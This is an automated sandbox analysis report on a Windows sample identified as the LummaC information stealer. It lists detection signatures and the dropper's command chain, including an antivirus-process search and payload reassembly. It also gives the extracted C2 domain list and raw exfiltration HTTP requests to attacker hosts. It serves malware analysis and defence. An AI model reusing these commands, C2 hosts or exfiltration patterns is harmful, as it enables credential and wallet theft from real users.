Edit tour

Windows Analysis Report
CLaYpUL3zw.exe

Overview

General Information

Sample name:	CLaYpUL3zw.exe renamed because original name is a hash value
Original sample name:	ccf904b9afa2515f1120932e4bd1f148.exe
Analysis ID:	1581578
MD5:	ccf904b9afa2515f1120932e4bd1f148
SHA1:	b7e131f06fd949ed071c745111d5589cd3be7ef9
SHA256:	06fc3e8f951fa3855d4056ea043a8de4d24b78df32f4423402305aa516fd56ff
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

CLaYpUL3zw.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\CLaYpUL3zw.exe" MD5: CCF904B9AFA2515F1120932E4BD1F148)

PasoCattle.exe (PID: 408 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)

cmd.exe (PID: 1240 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5136 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3836 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1680 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6020 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 4568 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 2148 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 5912 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1220 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Climb.com (PID: 5660 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 6388 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Set-up.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "scentniej.buzz", "appliacnesot.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Climb.com PID: 5660	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Climb.com PID: 5660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Climb.com PID: 5660	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.CLaYpUL3zw.exe.5d0000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x78d71d:$s1: Runner 0x78d882:$s3: RunOnStartup 0x78d731:$a1: Antis 0x78d75e:$a2: antiVM 0x78d765:$a3: antiSandbox 0x78d771:$a4: antiDebug 0x78d77b:$a5: antiEmulator 0x78d788:$a6: enablePersistence 0x78d79a:$a7: enableFakeError 0x78d8ab:$a8: DetectVirtualMachine 0x78d8d0:$a9: DetectSandboxie 0x78d8fb:$a10: DetectDebugger 0x78d90a:$a11: CheckEmulator

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1240, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6020, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:29:52.671566+0100	2028371	3	Unknown Traffic	192.168.2.5	49774	172.67.128.184	443	TCP
2024-12-28T09:29:54.952954+0100	2028371	3	Unknown Traffic	192.168.2.5	49781	172.67.128.184	443	TCP
2024-12-28T09:29:57.475683+0100	2028371	3	Unknown Traffic	192.168.2.5	49787	172.67.128.184	443	TCP
2024-12-28T09:30:00.115076+0100	2028371	3	Unknown Traffic	192.168.2.5	49794	172.67.128.184	443	TCP
2024-12-28T09:30:02.418306+0100	2028371	3	Unknown Traffic	192.168.2.5	49800	172.67.128.184	443	TCP
2024-12-28T09:30:05.088798+0100	2028371	3	Unknown Traffic	192.168.2.5	49810	172.67.128.184	443	TCP
2024-12-28T09:30:08.149158+0100	2028371	3	Unknown Traffic	192.168.2.5	49818	172.67.128.184	443	TCP
2024-12-28T09:30:13.613991+0100	2028371	3	Unknown Traffic	192.168.2.5	49830	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:29:53.732328+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49774	172.67.128.184	443	TCP
2024-12-28T09:29:55.726467+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49781	172.67.128.184	443	TCP
2024-12-28T09:30:14.478972+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49830	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:29:53.732328+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49774	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:29:55.726467+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49781	172.67.128.184	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:29:58.431227+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49787	172.67.128.184	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CLaYpUL3zw.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=I	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "scentniej.buzz", "appliacnesot.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: CLaYpUL3zw.exe	Virustotal: Detection: 52%			Perma Link
Source: CLaYpUL3zw.exe	ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: CLaYpUL3zw.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: spuriotis.click
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 5FwhVM--lll

Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_9bc950d3-3

Source: CLaYpUL3zw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49830 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_0055DC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_0056A087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_0056A1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_0055E472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_0056A570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0052C622 FindFirstFileExW,	14_2_0052C622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005666DC FindFirstFileW,FindNextFileW,FindClose,	14_2_005666DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00567333 FindFirstFileW,FindClose,	14_2_00567333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_005673D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_0055D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49787 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49774 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49774 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49830 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49781 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49781 -> 172.67.128.184:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: spuriotis.click
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 514003Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 34 39 38 30 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 34.226.108.155 34.226.108.155

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49781 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49774 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49794 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49787 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49800 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49830 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49810 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49818 -> 172.67.128.184:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4940WYF3RM3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12791Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EDJ2WBQBJ7BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: spuriotis.click
